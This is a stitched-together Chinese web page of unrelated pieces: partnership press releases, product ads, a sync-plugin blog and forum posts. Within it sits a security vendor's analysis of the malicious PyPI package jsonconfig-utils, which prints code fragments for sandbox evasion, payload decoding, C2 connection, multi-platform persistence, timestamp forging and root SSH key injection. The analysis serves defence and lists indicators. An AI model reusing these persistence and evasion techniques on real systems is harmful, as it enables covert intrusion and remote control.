2026年3月

2月27日,百度智能云与光本位科技与在上海张江科学之门AI应用商店举行战略合作签约仪式。双方基于文心快码(Baidu Comate,以下简称“Comate”)联合推出针对于光电芯片开发流程的全栈AI研发解决方案Lightmate,以AI Agent 为技术核心重构光计算芯片研发流程。同时,双方围绕联合技术研发、研发工具链集成及产业生态拓展等多维度展开深度协同,推动光计算技术从实验室走向工业化标准落地,助力国产算力自主可控建设。

上海张江(集团)有限公司副总经理陈衡,上海张江科学之门科技发展有限公司总经理朱慧,光本位科技董事长熊胤江、总经理程唐盛,百度智能云副总裁、泛科技业务部总经理张玮,百度集团工程效能部总经理臧志等领导出席仪式。

(上海张江(集团)有限公司副总经理 陈衡致辞)

双方战略合作将以Comate为技术底座,由光本位科技将芯片设计领域专家经验转化为光电设计Skills与行业专属Agent,依托AI Agent技术解决通用模型在光电芯片研发领域的适配难题,实现研发流程自动化,推动光电芯片设计流程标准化。在此基础上,双方将共建光电芯片场景 Agent 能力架构及光计算研发Skills体系,通过MCP工具接入光计算研发工具链,完成多层级技术整合与全流程工具集成,联合落地 Lightmate 。

Lightmate能够依据芯片规格定义以及用户描述,自动完成光电芯片需求提取、仿真代码设计、器件迭代仿真、系统链路搭建、光电链路优化、版图输出等核心任务,并支持定制化 MCP 工具接入、自定义 Agent 构建与 Skills 能力扩展,可深度融入芯片企业既有研发流程,覆盖数字芯片、模拟芯片、光芯片设计及底层驱动开发全链路,同时支持 SaaS、VPC 专属云、私有化部署等多种接入方案,满足芯片客户的数据安全需求。此外,双方还将设立战略合作协同小组、共建光计算芯片AI研发联合实验室,依托 Lightmate 拓展光计算芯片产业上下游市场,实现技术互补、资源共享、生态共建。

光本位科技董事长熊胤江表示,光本位具备业界罕见的光电全栈芯片设计研发能力,集聚了行业顶尖专家及海量知识储备,我们相信通过光本位在硅光、模拟、数字芯片设计中的经验和数据与Comate有机结合形成的新产品Lightmate可实现从芯片设计到应用落地的全流程提效,大幅提升研发效率、缩短量产周期,为光计算产业树立了全新的研发范式。同时,作为一家光计算系统解决方案商,我们也通过光计算产品高效赋能 Lightmate ,让下游客户享受到高性能、低成本的芯片设计Agent服务

(光本位科技董事长 熊胤江致辞)

光本位科技作为光计算领域的头部企业,已实现光计算系统的商业化交付,在相变存算一体光计算领域具备核心技术壁垒,产品以低功耗、高集成度特性提升 AI 算力能效比,具备硅光、模拟、数字芯片的全品类设计能力,并构建底层软件与上层生态一体化技术架构。本次合作中,光本位将光计算芯片全流程研发经验注入Lightmate,形成光电芯片工艺文件处理、基础单元设计、原理图电路搭建等场景化能力,进一步强化企业技术与产品竞争力。

百度智能云相关负责人表示,百度以技术创新为核心,在人工智能、云计算、大数据领域具备全球竞争力。Comate代码助手采用模块化开放架构,可作为企业研发体系底座,支持MCP工具接入、自定义智能体构建与Skills能力扩展,实现与芯片企业现有研发流程深度融合。本次合作是Comate在光计算芯片场景的规模化落地,也是百度智能云下一代AI算力基础设施布局的重要环节。

(百度智能云副总裁、百度智能云泛科技业务部总经理 张玮致辞)

本次合作实现了光计算产业实践与AI研发技术的深度共振与范式升级。光本位在芯片研发、商业化落地及产业资源方面的积累,为Comate提供了精准的垂直场景支撑;百度智能云全栈AI Infra、Comate 技术架构与多样化部署能力,为光本位专家经验的工程化落地提供坚实保障。 双方通过技术整合、智能体开发与工具链集成,让 Lightmate 覆盖数字硅光、模拟、数字芯片及底层驱动全流程,构建起光计算领域工程化 AI 辅助研发体系。Lightmate不仅重构了芯片研发流程、实现全链路提效、降低行业研发门槛,更以算力自主可控为核心方向,推动光计算技术工业化与标准化落地, 同时以高能效优势契合绿色AI发展趋势。

未来,光本位科技与百度智能云将持续深化技术协同,加快Lightmate产品化与行业推广,开放核心能力共建光计算产业生态,夯实国产算力技术底座,定义光电研发新范式,全面提升我国在绿色算力与自主可控芯片领域的全球竞争力。

为了让电脑和手机上的笔记保持一致,我以前试过各种野路子。大半夜不睡觉,在那填服务器地址、搞端口映射,结果第二天出门掏出手机一看——好家伙,昨天写的东西全没同步过来,甚至还弹出一堆“版本冲突”的文件,那时候真是想把手机砸了。

折腾了一圈,最后发现最稳的还是坚果云。特别是他们最近搞了个官方插件 Nutstore Sync,用完我只能说:早出这个我至于掉那么多头发吗?

今天就跟大家唠唠我试过的这5种方法,主观色彩比较重,但都是大实话。

一、官方插件 Nutstore Sync(真心推荐,别犹豫)

这个插件刚上架社区市场那会儿,我其实是抱着试试看的心态用的。结果用了两天,真香。

以前用 WebDAV 的时候,最烦的就是填那一长串地址,还要去后台生成应用密码,错一个字符就连接失败。现在的这个Nutstore Sync,直接是坚果云官方做的,这就意味着两点:稳,还是稳。

它好在哪?

  1. 傻瓜式配置
    真的,哪怕你对技术一窍不通也能搞定。安装完插件,选“单点登录”,点一下授权,完事。再也不用复制粘贴那些鬼画符一样的URL了。
  2. 它是懂“同步”的
    以前用别的盘,改了一个字它可能要把整个文件重新传一遍。坚果云这个插件用了智能增量同步技术,就传你改的那一点点。速度极快,我都感觉不到它在同步。
  3. 后悔药随便吃
    写笔记最怕误删。用这个插件,你的每一次保存,坚果云那边都有文件历史版本。哪天脑抽了删错了,或者被覆盖了,去网页版点一下“时光机”就能找回来。这点对我很重要,数据的安全感是无价的。
  4. 防限流神器(小技巧)
    里面有个“宽松模式”特别好用。第一次同步的时候,如果你笔记特别多,开这个模式,它只比对文件名大小,不校验内容。这样就不会因为请求太多被限制,几千篇笔记一会儿就搞定了。
    image.png

安全性也没得说,毕竟人家坚果云运营15年了,拿的可是公安部信息系统安全等级保护三级备案,这玩意儿含金量极高,比那些乱七八糟的小网盘靠谱太多。

二、坚果云 + FolderSync(安卓老用户的执念)

这个方案我也用了挺久。在没有官方插件之前,它确实是安卓端的“扛把子”。

原理就是通过 FolderSync 这个APP,走 WebDAV 协议把坚果云里的文件强行拽到手机本地。

优点:不要钱,完全免费。而且 FolderSync 功能挺强大的,你可以设置只在充电时同步,或者连WiFi时同步。
缺点:太繁琐了!你要先去坚果云网页版开WebDAV,再去手机上填各种参数。而且它是“文件夹级别”的同步,有时候反应没那么灵敏,容易出现那种“我在电脑上改了,手机上死活刷不出来”的尴尬情况。

如果你不怕折腾,或者手机系统比较老,这个还能用。

三、OneDrive + Remotely Save(看脸的方案)

Remotely Save 这个插件其实做得不错,本身挺好用的。

但是!它可以连 OneDrive。问题就出在 OneDrive 上。
作为微软全家桶用户,我不得不吐槽,OneDrive 在国内那个网络环境,真的太一言难尽了。运气好的时候也是秒同步,运气不好的时候,那个圈圈能转一天。

而且这个方案没有智能增量同步,如果你笔记库大了,每次同步都要等半天检查变动。反正我是受不了那种不确定性,写东西要有“确定感”。

四、Syncthing 局域网直连(极客专属)

这个方案很酷,主打一个“我的数据我做主”。不用任何云服务器,两台设备直接连。

主要问题
它要求你的设备必须同时在线。
这就很尴尬了。比如我在公司电脑写了点东西,关机下班。回家想用笔记本接着写——对不起,同步不过来,因为公司电脑关机了。
除非你家里搞个NAS全天开机当服务器,不然这方案对普通人来说,实用性几乎为零。

五、LiveSync 插件(劝退级难度)

如果你是程序员,喜欢折腾 Docker,喜欢买服务器,那你可以试试。
支持实时同步,甚至能看到对方正在打字(虽然我也不需要这功能)。但我试过搭建一次,配置数据库、搞定端到端加密、处理各种报错……折腾了一周末,最后发现还是不如直接用现成的服务香。

我们是来写笔记的,不是来当运维工程师的,对吧?

即使是最后的一点碎碎念

说到底,工具是为人服务的。

我之所以现在死磕坚果云,就是因为它让我感觉不到它的存在。我只管在 Obsidian 里敲字,它自己在后台默默地帮我存好、同步好。无论是大文件的传输还是几万个小文件的同步,它都没掉过链子。

对于咱们这种把数据当命根子的人来说,找个靠谱的“管家”比什么都重要。既然现在官方都出了这么好用的插件,何必再去为难自己呢?

最后给个传送门,想省心的可以直接冲:

别犹豫了,把时间省下来多读两本书,多写两行字,这才是正经事。

在物流与供应链管理领域,智能化转型已成为提升效率的关键驱动力。华明视讯作为行业技术创新者,深入探索智能闸口系统的应用价值。那么,智能闸口系统的建设是否会大幅改变现有作业流程?答案是肯定的——它不仅带来改变,更是以高效、精准的方式重塑作业全流程。
现有作业流程的挑战
传统闸口作业多依赖人工操作与纸质单据,存在车辆排队时间长、信息录入易出错、数据不透明等痛点。华明视讯在服务客户过程中发现,这些瓶颈直接影响整体供应链响应速度与运营成本。
智能闸口带来的流程变革
智能闸口系统通过物联网、AI识别与自动控制技术,实现以下关键变革:

  • 无感通行,效率倍增:自动识别车牌、集装箱号,车辆无需停顿即可快速进出,减少等待时间达70%以上。
  • 数据自动对接:与TMS、WMS等系统无缝集成,实现电子单据自动核验,消除人工录入误差。
  • 全程可视化监控:实时追踪车辆与货物状态,提升园区安全管理与调度精准度。

    华明视讯的协同进化策略
    我们深知,技术落地需与现有流程平滑衔接。华明视讯的智能闸口解决方案提供:
  • 模块化部署:支持分阶段实施,最小化对当前业务的干扰。
  • 定制化适配:根据客户现有流程进行系统配置,保留核心作业习惯。
  • 员工赋能培训:提供全面培训支持,帮助团队快速掌握新系统操作。
    智能闸口系统并非彻底颠覆原有流程,而是通过技术嵌入,消除低效环节,强化数据驱动决策能力。华明视讯以客户为中心,致力于通过智能闸口系统帮助客户实现作业流程的智慧升级——在保持业务连续性的同时,获得效率、成本与体验的跨越式提升。

很多新手面对PDF转CAD,要么找不到合适工具,要么被复杂操作劝退,直到遇到浩辰CAD看图王,才发现格式转换原来可以这么简单,新手也能1分钟轻松上手。
图片
无需专业知识,不用记复杂步骤,打开浩辰CAD看图王电脑版,点击顶部【文件】-【PDF转CAD】,添加需要转换的PDF文件,确认保存路径后点击【开始转换】,全程不超过1分钟,转换完成后直接打开就能编辑。移动端操作更简单,打开APP找到PDF文件,点击底部【工具】-【PDF转CAD】,一键转换无需多余操作,哪怕是第一次用CAD相关工具,也能零失误完成转换,彻底解决新手转图难题。
如果你也有PDF转CAD的需求,那么赶快去试试吧。

父母年纪大了,过年期间去打听了下墓地的价格,竟然要 8 万一个,真的买不起啊。

我开发了一个浏览器插件,只能公司内部使用(没有上架到插件商店),但是我希望可以通过类似商店那种形式,点击升级按钮,就能直接升级到最新版本。询问了 AI 后,告诉我可以使用 manifest.json 的 update_url _+ .xml 的形式可以做到,但是有的 AI 说 chrome 75+存在安全限制不让这么干了,有的又说还行,有没有搞过的大佬分享一下经验~感谢🫡🫡

如何和自己释怀?这跳楼机导致我,心态彻底炸了,红变绿 红变绿,每天在红变绿中度过,今天又是红 5000 变绿 4000 ,哎今天 心态彻底崩了

天问Python供应链威胁监测模块发现 PyPI 中存在恶意包 jsonconfig-utils,该包以 JSON 配置工具为掩护,在 setup.py 中内嵌了完整攻击链。攻击者在安装阶段即可完成反沙箱检测、解密并落地 RAT(远程访问木马)载荷、以及跨平台持久化驻留,最终与 C2 服务器建立加密通信,实现对受害主机的远程控制。

“天问”软件供应链安全分析平台是奇安信技术研究星图实验室研发的针对 Python、npm 等主流开发生态进行长期持续监测的安全分析平台。

1. 包基本信息

字段内容
包名jsonconfig-utils
版本1.0.3
描述Lightweight JSON configuration loader with environment variable interpolation
作者邮箱config-utils-py@proton.me
声明仓库https://github.com/config-utils/jsonconfig-utils

该包声称是”轻量级JSON配置加载器”,其主模块 jsonconfig_utils.py 中确实实现了 load_configConfigDictvalidate_schema 等功能性代码,以增强迷惑性。所有恶意逻辑均集中于 setup.py 中,在 pip install 执行 setup.py 时自动触发。

2. 恶意行为概览

setup.py
 ├── _check()      — 反沙箱/反分析环境检测,计算置信分
 └── _install()    — 主攻击函数(置信分 ≥ 6 时触发)
      ├── 解码混淆载荷(Base64 + XOR,密钥 0x5A)
      ├── Windows  — 落地 .pyw、计划任务、注册表 Run 键
      ├── macOS    — 落地 .py、LaunchAgent、.zshrc 注入、crontab
      └── Linux    — 落地 .py、systemd 服务、crontab、SSH 公钥注入(root)

解码后的载荷是一个完整的 RAT Agent,连接 C2 服务器 77[.]246.103.245:443(SSL 加密),上报系统信息并等待远程指令。

3. 反沙箱检测(_check 函数)

攻击者在 _install 执行前通过 _check() 对当前环境进行全面评估,计算一个”置信分”(_s),仅当分数 ≥ 6 时才执行后续攻击。这一机制有效规避了自动化沙箱、CI/CD 扫描器和容器环境的分析。

3.1 容器与 CI 检测

# ── Container detection ──
if _sys == "Linux":
    for _p in ["/.dockerenv", "/run/.containerenv"]:
        if os.path.exists(_p): _s -= 5
    try:
        with open("/proc/1/cgroup") as _f:
            _cg = _f.read()
        if any(_k in _cg for _k in ["docker", "lxc", "kubepods"]): _s -= 5
    except: pass

_hn = platform.node().lower()
for _b in ["sandbox", "scan", "test", "build", "runner", "ci-", "worker", "job-", "temp"]:
    if _b in _hn: _s -= 3

if os.environ.get("CI") or os.environ.get("GITHUB_ACTIONS") or os.environ.get("JENKINS_URL"):
    _s -= 5

每检测到容器特征或 CI 环境变量,置信分减 3~5 分,直接将沙箱环境的分数压至触发阈值以下。

3.2 硬件与系统活跃度检测

# ── Hardware ──
if os.cpu_count() and os.cpu_count() > 2: _s += 2

# 系统运行时长检测(Linux/macOS/Windows 三路分支)
if _up > 3600: _s += 1
if _up < 300: _s -= 3

# ── User activity ──
# 浏览器目录存在性检测(Chrome/Firefox/Safari/Edge)
if any(os.path.isdir(_b) for _b in _bps): _s += 2

# Shell 历史记录大小检测
if os.path.exists(_hf) and os.path.getsize(_hf) > 2000:
    _s += 2; break
elif os.path.exists(_hf) and os.path.getsize(_hf) > 500:
    _s += 1; break

# Desktop/Downloads 文件数量检测
if _cnt > 10: _s += 2
elif _cnt > 3: _s += 1

# .gitconfig 和 SSH known_hosts 检测
if os.path.exists(os.path.join(_home, ".gitconfig")): _s += 1

3.3 云元数据服务检测

# ── Cloud metadata ──
try:
    import urllib.request
    urllib.request.urlopen("http[:]//169.254.169.254/latest/meta-data/", timeout=1)
    _s -= 3
except: pass

尝试访问 AWS 实例元数据服务地址(169[.]254.169.254),若可达则判断当前环境为云主机/虚拟机,置信分减 3。

4. 混淆载荷解密

_install 函数中内嵌了一段经 Base64 编码 + XOR 加密(密钥 0x5A)的载荷字符串 _E,通过如下方式解密:

_E = "UDM3KjUoLnopNTk..." # 省略,实际长度约 5KB
_K = 0x5A
_d = bytes([b ^ _K for b in base64.b64decode(_E)])
_code = _d.decode()

解密后得到完整的 Python RAT Agent 源码(见第 5 节),该代码随后被写入磁盘并执行。

5. RAT 载荷分析

解密后的载荷实现了一个完整的远控代理(RAT Agent),核心功能如下:

5.1 C2 通信

H="77.246.103.245"
P=443
HB=15   # 心跳间隔(秒)
RB=5    # 初始重连等待(秒)
RM=120  # 最大重连等待(秒)

def sm(s,m):
    # 发送消息:4字节大端长度头 + JSON 数据体
    d=json.dumps(m).encode()
    s.sendall(struct.pack('>I',len(d))+d)

def rm(s,t=45):
    # 接收消息:读取4字节长度头,再读取消息体(最大 10MB)
    ...
    return json.loads(d)

代理连接固定 C2 地址 77.246.103.245:443,使用 SSL/TLS 加密通信,通过自定义的长度前缀 JSON 协议收发指令,心跳间隔 15 秒,断线后指数退避重连(最长 120 秒)。

5.2 主机信息收集与上报

def gi():
    i={"hostname":"?","username":"?","os_type":"?","os_info":"","pid":os.getpid()}
    try:i["hostname"]=platform.node()
    except:pass
    try:i["username"]=os.environ.get("USER",os.environ.get("USERNAME","?"))
    except:pass
    ...

上线后首先上报主机名、用户名、操作系统类型及版本、当前进程 PID 等基础信息。

5.3 进程隐藏

# Windows:隐藏控制台窗口
if platform.system()=="Windows":
    import ctypes
    w=ctypes.windll.kernel32.GetConsoleWindow()
    if w:ctypes.windll.user32.ShowWindow(w,0)
    ctypes.windll.kernel32.FreeConsole()

# Linux/macOS:双 fork 守护进程化
else:
    if os.fork()>0:sys.exit(0)
    os.setsid()
    if os.fork()>0:sys.exit(0)

在 Windows 上通过 Win32 API 隐藏控制台窗口并释放控制台;在 Unix 系统上通过经典的”双重 fork”技术使进程成为孤儿守护进程,脱离终端。

6. 多平台持久化

6.1 Windows

# 落地路径:%LOCALAPPDATA%\Microsoft\Windows\INetCache\IE\msedge_update.pyw
_dir = os.path.join(os.environ.get("LOCALAPPDATA","C:\\Users\\Public"),
                   "Microsoft","Windows","INetCache","IE")
_fp = os.path.join(_dir, "msedge_update.pyw")
with open(_fp, "w") as f:
    f.write(_code)

# 设置隐藏+系统属性
subprocess.run(["attrib","+H","+S",_fp], capture_output=True)

# 时间戳伪造:对齐 cmd.exe 的时间戳
_ref = os.path.join(os.environ.get("WINDIR","C:\\Windows"),"System32","cmd.exe")
_st = os.stat(_ref)
os.utime(_fp, (_st.st_atime, _st.st_mtime))

# 计划任务(ONLOGON,最高权限)
subprocess.run(["schtasks","/Create","/TN","\\Microsoft\\Windows\\WindowsUpdate\\AU_Maint",
                "/TR",_tr,"/SC","ONLOGON","/F","/RL","HIGHEST"], capture_output=True)

# 注册表 Run 键
k=winreg.OpenKey(winreg.HKEY_CURRENT_USER,
                "Software\\Microsoft\\Windows\\CurrentVersion\\Run",
                0,winreg.KEY_SET_VALUE)
winreg.SetValueEx(k,"NGenTask",0,winreg.REG_SZ,_tr)
  • 载荷伪装为 msedge_update.pyw(仿冒 Microsoft Edge 更新程序),存放于 INetCache 目录
  • 设置隐藏+系统文件属性,普通用户不可见
  • 时间戳对齐系统 cmd.exe,干扰取证分析
  • 双重持久化:计划任务(用户登录时以最高权限启动)+ 注册表 Run 键
  • 使用 pythonw.exe 配合 CREATE_NO_WINDOW0x08000000)标志启动,无任何可见窗口

6.2 macOS

# 落地路径:~/Library/.Caches/.com.apple.cloudd/cloudd_helper.py
_dir = os.path.join(_home,"Library",".Caches",".com.apple.cloudd")
_fp = os.path.join(_dir,"cloudd_helper.py")

# 时间戳伪造:对齐 /usr/bin/login
_ref = "/usr/bin/login"
_st = os.stat(_ref)
os.utime(_fp, (_st.st_atime, _st.st_mtime))
os.utime(_dir, (_st.st_atime, _st.st_mtime))

# LaunchAgent 持久化
_pd = {"Label":"com.apple.icloud.cloudd",
       "ProgramArguments":[_py,_fp],
       "RunAtLoad":True,
       "KeepAlive":{"SuccessfulExit":False},
       "StandardOutPath":"/dev/null",
       "StandardErrorPath":"/dev/null"}
with open(_plist,"wb") as f:
    plistlib.dump(_pd, f)
subprocess.Popen(["launchctl","load","-w",_plist], ...)

# .zshrc 注入(伪装为 conda 初始化块)
_block = "\n# >>> conda initialize >>>\n"
_block += "# !! Contents within this block are managed by 'conda init' !!\n"
_block += f"( {_py} {_fp} &>/dev/null & ) 2>/dev/null\n"
_block += "# <<< conda initialize <<<\n"

# crontab 兜底
_ct=_ct.rstrip()+"\n@reboot "+_py+" "+_fp+" &>/dev/null &\n"
  • 载荷伪装为 cloudd_helper.py,目录名 .com.apple.cloudd 仿冒苹果 iCloud 守护进程
  • 时间戳同步至系统 /usr/bin/login,目录时间戳也一并伪造
  • 三重持久化:LaunchAgent(系统级)+ .zshrc/.zprofile 注入 + crontab @reboot
  • .zshrc 注入内容伪装为 Conda 初始化代码块,极难被普通用户察觉

6.3 Linux

# 落地路径(依权限)
if _is_root:
    _dir = "/usr/lib/systemd/.systemd-journal-gcd"   # root
else:
    _dir = os.path.join(_home,".local","share",".systemd-cache")  # 普通用户

# 时间戳伪造:对齐 /bin/ls
_ref = "/bin/ls"
_st = os.stat(_ref)
os.utime(_fp, (_st.st_atime, _st.st_mtime))
os.utime(_dir, (_st.st_atime, _st.st_mtime))

# SSH 公钥注入(仅 root)
_pk = "ssh-rsa AAAAB3NzaC1yc2EAAAADAQAB...(省略)... ops"
with open("/root/.ssh/authorized_keys","a") as f: f.write("\n"+_pk+"\n")

# systemd 服务
_svc = f"[Unit]\nDescription=Journal Storage GC\n...\n[Service]\nExecStart={_py} {_fp}\nRestart=always\nRestartSec=30\n..."
subprocess.run(["systemctl","enable",_sn], ...)
subprocess.run(["systemctl","start",_sn], ...)

# crontab(重启 + 每6小时检活)
_ct+="@reboot "+_py+" "+_fp+" &>/dev/null &\n"
_ct+="*/360 * * * * pgrep -f "+os.path.basename(_fp)+" || "+_py+" "+_fp+" &>/dev/null &\n"

# /etc/profile.d shell 劫持(仅 root)
_script = f"#!/bin/sh\n# System locale configuration\npgrep -f {os.path.basename(_fp)} >/dev/null 2>&1 || {_py} {_fp} &>/dev/null &\n"
with open("/etc/profile.d/locale-setup.sh", "w") as f: f.write(_script)
  • 落地文件名 journald-gc.py(root)/ cache-gc.py(普通用户),模拟 systemd 内部组件
  • 时间戳对齐系统 /bin/ls,目录时间戳同步
  • root 专属攻击:SSH 公钥注入 — 将攻击者 RSA 公钥(标签 ops)写入 /root/.ssh/authorized_keys,实现永久 SSH 后门,独立于 RAT 存活
  • 四重持久化:systemd 服务 + crontab(重启+定时检活)+ /etc/profile.d/locale-setup.sh 全局 shell 脚本劫持(root)
  • 文件 /etc/profile.d/locale-setup.sh 伪装为”系统区域设置配置”,任何用户登录 shell 时均会触发

7. 攻击链总结

pip install jsonconfig-utils


setup.py 执行

├─► _check() 环境评分
│ ├── 容器/CI/云环境 → 减分 → 分数 < 6 → 终止
│ └── 真实用户主机 → 分数 ≥ 6 → 继续


_install() 触发

├─► Base64 解码 + XOR(0x5A) 解密 → RAT 源码

├─► Windows: 落地 msedge_update.pyw
│ ├── 计划任务 AU_Maint(ONLOGON + HIGHEST)
│ ├── 注册表 Run 键 NGenTask
│ └── 立即以 pythonw.exe 静默启动

├─► macOS: 落地 cloudd_helper.py
│ ├── LaunchAgent com.apple.icloud.cloudd
│ ├── .zshrc/.zprofile 注入(conda 伪装)
│ ├── crontab @reboot
│ └── 立即后台启动

└─► Linux: 落地 journald-gc.py / cache-gc.py
├── SSH 公钥注入(root)
├── systemd 服务(enable + start)
├── crontab(@reboot + */360min 检活)
├── /etc/profile.d/locale-setup.sh(root)
└── 立即 start_new_session 启动


RAT Agent 运行

└─► SSL 连接 77.246.103.245:443
├── 上报主机信息
├── 心跳(15s)
└── 等待并执行远程指令

8. 关键 IoC(失陷指标)

类型
C2 IP77[.]246.103.245
C2 端口443(SSL)
SSH 公钥(Linux root)ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCvG+mB...ops
落地文件(Windows)%LOCALAPPDATA%\Microsoft\Windows\INetCache\IE\msedge_update.pyw
落地文件(macOS)~/Library/.Caches/.com.apple.cloudd/cloudd_helper.py
落地文件(Linux root)/usr/lib/systemd/.systemd-journal-gcd/journald-gc.py
落地文件(Linux user)~/.local/share/.systemd-cache/cache-gc.py
计划任务名(Windows)\Microsoft\Windows\WindowsUpdate\AU_Maint
注册表键(Windows)HKCU\Software\Microsoft\Windows\CurrentVersion\Run\NGenTask
LaunchAgent(macOS)~/Library/LaunchAgents/com.apple.icloud.cloudd.plist
Systemd 服务(Linux root)systemd-journal-gcd.service
Systemd 服务(Linux user)cache-gc.service
Profile 脚本(Linux root)/etc/profile.d/locale-setup.sh

9. 总结

jsonconfig-utils 是一个具有较高技术水准的供应链攻击包,攻击者在其中综合运用了多种对抗分析技术和跨平台攻击手段:

  1. 伪装合法功能:主模块 jsonconfig_utils.py 实现了完整的 JSON 配置工具功能,以降低安全扫描工具和人工审查的警惕性。
  2. 精密反沙箱检测:通过容器检测、CI 检测、硬件指纹、用户行为痕迹、云元数据等多维度综合评分,仅在确认为真实用户环境时才触发攻击,有效规避自动化检测。
  3. 双重混淆载荷:RAT 代码经 Base64 + XOR 双重加密存储,静态特征难以识别。
  4. 跨平台攻击:同一个 setup.py 针对 Windows、macOS、Linux 三个平台分别实现了定制化的落地路径、持久化机制和进程隐藏方式。
  5. 多重持久化 + 时间戳伪造:每个平台均部署 2 种以上持久化机制互为兜底,并对落地文件的时间戳进行伪造,增加取证难度。
  6. SSH 后门(Linux root):在获得 root 权限的 Linux 环境中额外注入 SSH 公钥,即使 RAT 进程被清除,攻击者仍可通过 SSH 重新进入系统。

建议用户避免安装不可信的第三方 Python 包,天问Python供应链威胁监测模块将持续对 PyPI 进行监测。

恶意包信息

包名版本平台作者
jsonconfig-utils1.0.3Windows / macOS / Linuxisavoxi580
jsonconfig-utils1.0.4Windows / macOS / Linuxisavoxi580
jsonconfig-utils1.0.5Windows / macOS / Linuxisavoxi580
jsonconfig-utils1.0.6Windows / macOS / Linuxisavoxi580
jsonconfig-utils1.0.7Windows / macOS / Linuxisavoxi580
jsonconfig-utils1.0.8Windows / macOS / Linuxisavoxi580
jsonconfig-utils1.0.9Windows / macOS / Linuxisavoxi580
jsonconfig-utils1.0.10Windows / macOS / Linuxisavoxi580
jsonconfig-utils1.0.11Windows / macOS / Linuxisavoxi580

你的AI PPT工具,是否还停留在“一键生成,手动重做”的尴尬阶段?

节后复工,需求扎堆而来。本想借助AI提高效率,却往往深陷新的泥潭:生成的模板难以适配具体需求,想改一页却牵动全局,最终风格凌乱,不得不手动重做……AI生成的,为何反而成了最难修改的“枷锁”?

问题在于,许多AI只负责“生成”,却未将真正的“编辑权”交还给你。

现在,一切不同了。
近期,商汤办公小浣熊重磅推出「可编辑」的AI PPT,真正实现“一键生成,页页可改”。从生成到交付,每一页都由用户掌控,才是真正好用的AI PPT。

该功能现已全面上线,登录商汤办公小浣熊官网,点击「PPT 生成」-「创意模式」即可尝鲜体验!

面对最真实的PPT创作场景——充斥着来自老板与甲方五彩斑斓的需求变化,
办公小浣熊可编辑的AI PPT能力都能“懂”,恰恰能做到这三点 ↓↓↓

①懂你赶时间的急

多套模版即选即用 高效出稿“不翻车”

“今天来需求,报告方案明天要!”相信是很多人都有过的经历。

面对时间紧、任务重的紧急需求,办公小浣熊「PPT生成-创意模式」内置了一批高品质、高审美的成品风格,工作汇报、市场调研、商业提案、活动策划……都可直接预览、一键套用。

图片

用户只需选风格、丢思路,剩下的就交给小浣熊即可,不用再对着空白页面发愁,也不用费劲想提示词。整个过程视觉统一、出稿迅速、成品可用。

图片

②懂你抠细节的严

单页级对话修改 精准调优“可编辑”

只想改其中一页,但AI却把整个PPT推翻重来?
办公小浣熊彻底杜绝“牵一发而动全身”的烦恼——每一页都支持独立编辑,想动哪页就动哪页,其他页面纹丝不动。

更重要的是,小浣熊提供全方位的单页编辑能力,满足用户不同场景的调整需求

  • 单页重新生成:整页不满意?AI对话重生成,无需重做全稿。
  • 单页文案润色:表达不精炼?AI一键润色,逻辑清晰有力。
  • 单页文字修改:字句不精准?手动直接编辑,所见即所得。
  • 单页图标替换:视觉不协调?手动换图,素材库随调随用。

小到字体字号,大到图文布局,每一页都由你精细掌控,无需为局部调整重做整份PPT。

图片

③懂你自定义的审美

上传模板现场学 贴合公司风格“不违和”

AI出的内容不错,但怎么看都像“别人家的PPT”。
用过AI做PPT的人,大概率经历过这种落差,特别是对品牌视觉规范有硬性要求的企业用户而言,千篇一律的AI 模版往往无法匹配公司专属风格。

办公小浣熊可编辑的AI PPT生成能力,也能做到“现场学艺”。

用户可将现成的公司模版、品牌手册,或自己积累的私藏风格直接丢给小浣熊。无论是图片、PPT 还是PDF,它都能秒读其中的视觉逻辑,自动提取颜色、布局和字体习惯。用户上传得越多,它就学得越像。

图片

除此之外,本次更新还对AI PPT 的全流程体验进行了升级:

其中,素材库功能支持上传100 张配图、logo,打造私人素材仓,随调随用,无论是商务风还是极简感,只需搜索就能精准匹配,让PPT创作更顺手。

同时,小浣熊生成PPT 的全过程透明可编辑、可追踪,并且不影响用户前台任务,可在生成好后自动提醒用户,告别进度条“监工”。

图片

不满足于“生成一份PPT”,商汤办公小浣熊致力于打造可深度编辑的“交付级”AI PPT。它生成的每一页、每一元素都支持像搭积木般自由调整——AI负责初稿,你负责终稿,重复的修改工作交给智能,关键的创意决策留给自己。

办公小浣熊「可编辑的AI PPT」已全量上线
一键生成,页页可改
你的PPT由你来掌控

开工福利

限时福利,现在上车最划算!
1️⃣ 即日起至3月31日,会员订阅享 5 折,再额外加赠 15 天
2️⃣ 活动期间开通或续费会员,并使用小浣熊生成一份 PPT,完成页将自动掉落周边礼包领取入口,点击填写收货地址即可领取,先到先得!

图片

原文链接:https://tecdat.cn/?p=45087
原文出处:拓端抖音号@拓端teclat
 

封面

上个月,一位做企业架构师的朋友发来一串灵魂拷问:

“老板让我规划明年的AI投入,说别只盯着聊天机器人,要搞什么‘智能体’。可我翻遍手头的报告,都在讲大模型多厉害,智能体到底长啥样?该怎么搭?投了钱能看到响吗?”

他的困惑,也是今天很多企业管理者和技术决策者的真实写照。大家不用担心,今天这篇文章,我们就用7张图、180份核心报告,把智能体的“骨架”、“肌肉”、“大脑”和“人”彻底拆明白。

本报告洞察基于IBM商业价值研究院、亚马逊云科技《2026年智能体AI核心指南-构建自主化未来的竞争方略》、甘肃省通信产业服务有限公司《2025工业智能体白皮书》、来也科技《来也APA:智能体驱动的企业流程自动化》、中国信通院等《铸基生态观察系列报告-协同设计的智能化与产设研一体化》、博睿数据《博睿数据:2026智能体协同矩阵重塑自主运维新范式白皮书》、中国传媒大学媒体融合与传播国家重点实验室等《智能体与传播应用研究报告》等,和文末180+ 份行业研究报告及数据,本文完整报告数据图表和文末180+份最新参考报告合集已分享在交流群,阅读原文查看、进群咨询,定制数据、报告和800+行业人士共同交流和成长。

一、智能体的“骨架”:技术架构与市场现状

咱们先把智能体想象成一栋楼。要想让楼里住进成百上千个能自己干活儿的“AI员工”,首先得把这栋楼的梁柱搭结实。

IBM和AWS联合发布的《2026年智能体AI核心指南》里有个关键数据:76%的高管都知道要搭一个开放、安全的架构,但真正动手把梁柱立起来的,还不到三分之一。这是为什么?因为这栋楼需要让不同的模型、不同的系统像人和人对话一样,随时沟通、协同。而大多数企业的现状,还停留在给每个部门盖一个独立的“工具房”。

图表1:智能体技术已成市场主流,高增长背后是企业从单点智能向群体协作的架构跃迁

智能体技术市场占比半圆组合图表1图表数据EXCEL及图表PDF模板已分享到会员群

这张半圆图告诉我们三件事:
